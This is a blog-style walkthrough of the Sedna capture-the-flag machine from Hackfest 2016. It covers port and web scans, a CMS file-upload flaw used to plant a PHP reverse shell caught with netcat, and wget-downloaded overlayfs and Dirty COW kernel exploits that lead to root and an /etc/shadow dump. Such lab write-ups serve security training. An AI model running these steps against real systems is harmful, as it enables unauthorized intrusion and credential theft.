hackfest2016: Sedna
Location
https://download.vulnhub.com/hackfest2016/Sedna.ova
Description
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Medium
According to the description there are multiple ways to root this box. This machine should be doable for someone who has some experience.
There are 4 flags on this machine 1 for a shell, 1 for root access and 2 for doing post exploitation on Sedna.
Getting started
Starting with nmap to see what ports are open and what services run behind them.
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -sC -p- 192.168.171.5 Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 20:18 CET Nmap scan report for 192.168.171.5 Host is up (0.0096s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA) | 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA) |_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA) 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu | dns-nsid: |_ bind.version: 9.9.5-3-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE STLS TOP RESP-CODES SASL UIDL CAPA PIPELINING | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 47986/tcp status |_ 100024 1 52537/udp status 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd (Ubuntu) |_imap-capabilities: LOGIN-REFERRALS IDLE more have ID post-login SASL-IR listed capabilities LOGINDISABLEDA0001 STARTTLS LITERAL+ IMAP4rev1 ENABLE OK Pre-login | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: ERROR: Script execution failed (use -d to debug) 445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_imap-capabilities: LOGIN-REFERRALS IDLE more ID have SASL-IR post-login listed OK capabilities LITERAL+ IMAP4rev1 ENABLE AUTH=PLAINA0001 Pre-login | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3 Dovecot pop3d | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: ERROR: Script execution failed (use -d to debug) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat 47986/tcp open status 1 (RPC #100024) Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s |_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 4.1.6-Ubuntu) | NetBIOS computer name: SEDNA\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2017-03-17T16:20:58-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 135.68 seconds
A lot of open ports and services running. I’ll start with port 80 and work my way through the list of open ports.
Webserver
First stop is the main page. Nothing much in the source code, so it’s time to start up dirsearch.
┌─[n13mant@planetmars]─[~] └──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405 _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php | Threads: 10 | Wordlist size: 4614 Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-56-27.log Target: http://192.168.171.5 [12:56:27] Starting: [12:56:27] 200 - 101B - / [12:56:27] 403 - 284B - /.hta [12:56:40] 301 - 314B - /blocks -> http://192.168.171.5/blocks/ [12:56:56] 301 - 313B - /files -> http://192.168.171.5/files/ [12:57:03] 200 - 101B - /index.html [12:57:13] 301 - 315B - /modules -> http://192.168.171.5/modules/ [12:57:28] 200 - 36B - /robots.txt [12:57:31] 403 - 293B - /server-status [12:57:38] 301 - 314B - /system -> http://192.168.171.5/system/ [12:57:39] 301 - 314B - /themes -> http://192.168.171.5/themes/
Because there is a proxy server running I’ll do the dirsearch scan again, but this time via the proxy server.
┌─[n13mant@planetmars]─[~] └──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5:8080/' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405 _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php | Threads: 10 | Wordlist size: 4614 Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-58-28.log Target: http://192.168.171.5:8080/ [12:58:28] Starting: [12:58:29] 200 - 2KB - / [12:58:53] 302 - 0B - /docs -> http://192.168.171.5:8080/docs/ [12:58:57] 302 - 0B - /examples -> http://192.168.171.5:8080/examples/ [12:59:05] 302 - 0B - /host-manager -> http://192.168.171.5:8080/host-manager/ [12:59:07] 200 - 2KB - /index.html [12:59:13] 302 - 0B - /manager -> http://192.168.171.5:8080/manager/ [12:59:14] 302 - 0B - /META-INF -> http://192.168.171.5:8080/META-INF/
This time I get a basic HTML authentication. Before continuing this lead, I run a nikto scan on port 80 first.
┌─[n13mant@planetmars]─[~] └──╼ $nikto -h 'http://192.168.171.5/' - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.171.5 + Target Hostname: 192.168.171.5 + Target Port: 80 + Start Time: 2017-03-21 18:52:15 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + "robots.txt" contains 1 entry which should be manually viewed. + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /files/: Directory indexing found. + OSVDB-3092: /files/: This might be interesting... + OSVDB-3092: /system/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /license.txt: License file found may identify site software. + 7536 requests: 0 error(s) and 12 item(s) reported on remote host + End Time: 2017-03-21 18:53:05 (GMT1) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
A license file with possible site software. Worth taking a look. First I run nikto again, but this time via the proxy server.
┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/' --useproxy 'http://192.168.171.5:8080/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.171.5
+ Target Hostname: 192.168.171.5
+ Target Port: 80
+ Proxy: 192.168.171.5:8080
+ Start Time: 2017-03-21 13:16:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS (May be proxy's methods, not server's)
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7838 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-03-21 13:17:49 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Looking at all the information gathered I decide to check out the licence file first.
After a quick search on exploit-db it seems like there is an exploit which leads to an arbitrary file upload that will place the file in the/files/ folder.
In the exploit mentioned there is a piece of HTML code I can use to inject it into the page which creates a form to upload files.
For the upload I use the php reverse shell code from pentestmonkey. After I finished the upload I run the file and this way get a reverse shell.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $nc -lvnp 31337 Listening on [0.0.0.0] (family 0, port 31337) Connection from 192.168.171.5 60358 received! Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 15:17:37 up 37 min, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
Now to look around the system.
www-data@Sedna:/home$ cat /etc/passwd cat /etc/passwd [.....SNIP....] crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
www-data@Sedna:/home$ cd /var/www cd /var/www www-data@Sedna:/var/www$ ls -lah ls -lah total 16K drwxr-xr-x 3 root root 4.0K Oct 22 13:33 . drwxr-xr-x 13 root root 4.0K Oct 7 15:17 .. -rw-r--r-- 1 www-data www-data 33 Oct 22 13:33 flag.txt drwxr-xr-x 9 www-data www-data 4.0K Oct 25 09:27 html www-data@Sedna:/var/www$ cat flag.txt cat flag.txt bfbb7e6e6e88d9ae66848b9aeac6b289
First flag.
www-data@Sedna:/$ uname -a uname -a Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux www-data@Sedna:/$ cat /etc/*release cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS" NAME="Ubuntu" VERSION="14.04.1 LTS, Trusty Tahr" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 14.04.1 LTS" VERSION_ID="14.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
Ubuntu 14.04 and kernel 3.13.0 Maybe an overlayfs exploit will work to get root.
I download the code from exploit-db and paste it into a file on my local system. With SimpleHTTPServer I wget it onto the remote system. From there I compile it and run it.
www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/overlayfs.c wget http://192.168.171.3:8000/overlayfs.c --2017-03-24 00:34:09-- http://192.168.171.3:8000/overlayfs.c Connecting to 192.168.171.3:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 4968 (4.9K) [text/plain] Saving to: 'overlayfs.c' 100%[======================================>] 4,968 --.-K/s in 0s 2017-03-24 00:34:09 (583 MB/s) - 'overlayfs.c' saved [4968/4968] www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs.c chmod 777 overlayfs.c www-data@Sedna:/tmp/n13mant$ gcc overlayfs.c -o overlayfs gcc overlayfs.c -o overlayfs www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfc chmod 777 overlayfc chmod: cannot access 'overlayfc': No such file or directory www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs chmod 777 overlayfs www-data@Sedna:/tmp/n13mant$ ./overlayfs ./overlayfs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library www-data@Sedna:/tmp/n13mant$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
The start looked promising…but unfortunately no root. With the kernel version number in hand I tried several exploits. After a while I tried the ‘dirty cow’ exploit. It’s a race condition that was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. In other words, an unprivileged local user could get write access to a read-only memory mapping and raise his privileges. There is a very good explanation about ‘Dirty Cow’, which you can find here. Also to be fair….I must warn you that if you try different ‘Dirty Cow’ exploits it’s wise to make a snapshot of your Sedna box because the exploit can crash your box and you need a fresh one to try again. In RL this would mean admins will probably get the signal there is something wrong with their server as it crashed, which normally isn’t a good thing LoL.
After a few tries I found out the ‘Dirty Cow’ exploit from Firefart did the trick. After downloading the source code to the remote machine, I compiled and ran it. Unfortunately with this exploit I need to act fast. After I run the exploit it will make the box to freeze up and I need to reboot it.
www-data@Sedna:/tmp$ mkdir n13mant mkdir n13mant www-data@Sedna:/tmp$ cd n13mant www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/40839.c wget http://192.168.171.3:8000/40839.c --2017-03-25 11:25:25-- http://192.168.171.3:8000/40839.c Connecting to 192.168.171.3:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 5124 (5.0K) [text/plain] Saving to: '40839.c' 100%[======================================>] 5,124 --.-K/s in 0s 2017-03-25 11:25:25 (743 MB/s) - '40839.c' saved [5124/5124] www-data@Sedna:/tmp/n13mant$ gcc -pthread 40839.c -o dcow -lcrypt gcc -pthread 40839.c -o dcow -lcrypt www-data@Sedna:/tmp/n13mant$ ./dcow thisismypassword ./dcow thisismypassword /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: thisismypassword Complete line: firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash mmap: b7752000
Now to move fast.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh -l firefart 192.168.171.5
firefart@192.168.171.5's password:
Added user firefart.
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Mar 25 11:49:03 EDT 2017
System load: 0.41 Memory usage: 4% Processes: 51
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0
=> There is 1 zombie process.
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# cat /etc/shadow
root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::
[.....SNIP.....]
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
statd:*:17110:0:99999:7:::
firefart@Sedna:~# ls -lah
total 65M
drwx------ 5 firefart root 4.0K Mar 12 00:54 .
drwxr-xr-x 21 firefart root 4.0K Oct 7 15:17 ..
-rw-r--r-- 1 firefart root 65M Oct 24 07:04 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
-rw------- 1 firefart root 212 Mar 12 00:54 .bash_history
-rw-r--r-- 1 firefart root 3.1K Feb 19 2014 .bashrc
drwx------ 2 firefart root 4.0K Oct 22 22:14 .cache
drwxr-xr-x 2 firefart root 4.0K Oct 7 20:04 chkrootkit
---------- 1 firefart root 33 Oct 22 13:07 flag.txt
-rw-r--r-- 1 firefart root 140 Feb 19 2014 .profile
-rw-r--r-- 1 firefart root 66 Oct 8 03:34 .selected_editor
drwx------ 2 firefart root 4.0K Oct 22 22:14 .ssh
firefart@Sedna:~# cat flag.txt
a10828bee17db751de4b936614558305
I got root…..I got the flag…..game over.
There are some more flags to gain. For example by probably cracking the hash from ‘crackmeforpoints’ or ‘root’ with hashcat or John the Ripper, but for time purposes I’ll let someone else do that.
Conclusion
The challenge was a bit frustrating. Not many hints or leads to get further and when you finally get a working exploit, the system gets unstable and you need to hurry to get the job done. Too slow and you need to reboot and try again. I think the challenge would be a bit more fun if the system would be a bit more stable after the exploit. If someone else has a better solution, please do tell.